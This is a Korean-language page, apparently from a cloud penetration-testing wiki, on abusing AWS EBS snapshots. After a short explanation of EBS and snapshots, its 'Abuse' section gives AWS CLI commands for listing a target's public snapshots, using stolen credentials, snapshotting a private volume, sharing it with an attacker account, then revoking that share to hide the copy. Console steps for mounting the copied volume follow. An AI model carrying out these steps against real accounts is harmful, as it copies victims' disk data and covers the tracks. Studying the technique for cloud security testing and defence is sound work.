EBS Snapshot

EBS(Elastic Block Store)는 EC2 인스턴스에 연결해 사용하는 블록 스토리지 서비스입니다. 하드디스크에 저장된 데이터를 탈부착하여 다른 데스크탑과 연결해 사용할 수 있는 것처럼 다른 인스턴스와 연결하여 사용할 수 있습니다.

스냅샷은 인스턴스를 저장하고자 하는 시점(특히 초기화 직후)에서 생성하면 언제든 해당 시점과 동일하게 복원할 수 있는 기능으로, 스냅샷을 통해 볼륨을 생성하는 것이 가능합니다.

따라서 스냅샷에 대해 접근 권한이 있는 자격증명을 획득하거나, 퍼블릭 스냅샷을 자신의 인스턴스에 복제하기 위해 해당 스냅샷으로부터 자신의 AWS 볼륨을 생성하고 해당 볼륨을 인스턴스에 연결함에 따라 대상 시스템을 그대로 복사할 수 있습니다.

Abuse

# Account ID를 기반으로 퍼블릭 EBS 목록 열거
aws ec2 describe-snapshots --owner-ids '<target-account-id>' --region 'ap-northeast-2' --query "Snapshots[*].[SnapshotId,VolumeSize,Description]" --output table

# 공격자 계정으로 스냅샷 복사
aws ec2 create-volume --availability-zone 'ap-northeast-2' --snapshot-id '<snap-id>'

# 획득한 크리덴셜을 이용하여 관리형 정책 확인
aws iam list-attached-user-policies --user-name '<user-id>' --query "AttachedPolicies[*].PolicyName" --output table

# 인라인 정책 확인
aws iam list-user-policies --user-name '<user-id>'
aws iam get-user-policy --user-name '<user-id>' --policy-name '<policy-name>'

# Private EBS의 스냅샷 생성
aws ec2 create-snapshot --volume-id '<volume-id>' --description '<snap-id>'

# 공격자 계정이 EBS 스냅샷에 접근할 수 있도록 권한 부여
aws ec2 modify-snapshot-attribute --snapshot-id '<snap-id>' -attribute createVolumePermission --operation-type add --user-ids '<account-id>' 

# 공격자 계정으로 스냅샷 복사
aws ec2 create-volume --availability-zone 'ap-northeast-2' --snapshot-id '<snap-id>'

# 할당한 공격자 계정의 권한을 삭제
aws ec2 modify-snapshot-attribute --snapshot-id '<snap-id>' -attribute createVolumePermission --operation-type remove --user-ids '<account-id>'

공개 스냅샷을 검색하기 위해 AWS > EC2 > 스냅샷 > 퍼블릭 스냅샷 에서 스냅샷 아이디를 검색합니다.

검색 이후 식별된 스냅샷을 우클릭하여 스냅샷에서 볼륨 생성 후 볼륨 목록에서 생성된 볼륨을 확인합니다.

볼륨 연결을 위한 인스턴스 생성 이후 볼륨 우클릭에서 인스턴스 연결을 클릭한 뒤 생성한 인스턴스 아이디를 입력하여 연결합니다.

이후 인스턴스 시스템에 연결하여 로컬 디스크와 볼륨 정보를 확인하기 위해 lsblk 명령 사용 이후 연결된 볼륨의 경로를 마운트하여 스냅샷과 연결합니다.

# 로컬 디스크 확인
lsblk

# 디렉토리 생성 및 마운트
sudo mount /dev/xvdf1 temp

Previous후속 공격 NextRDS Snapshot

Last updated 1 month ago

hashtagAbuse

Abuse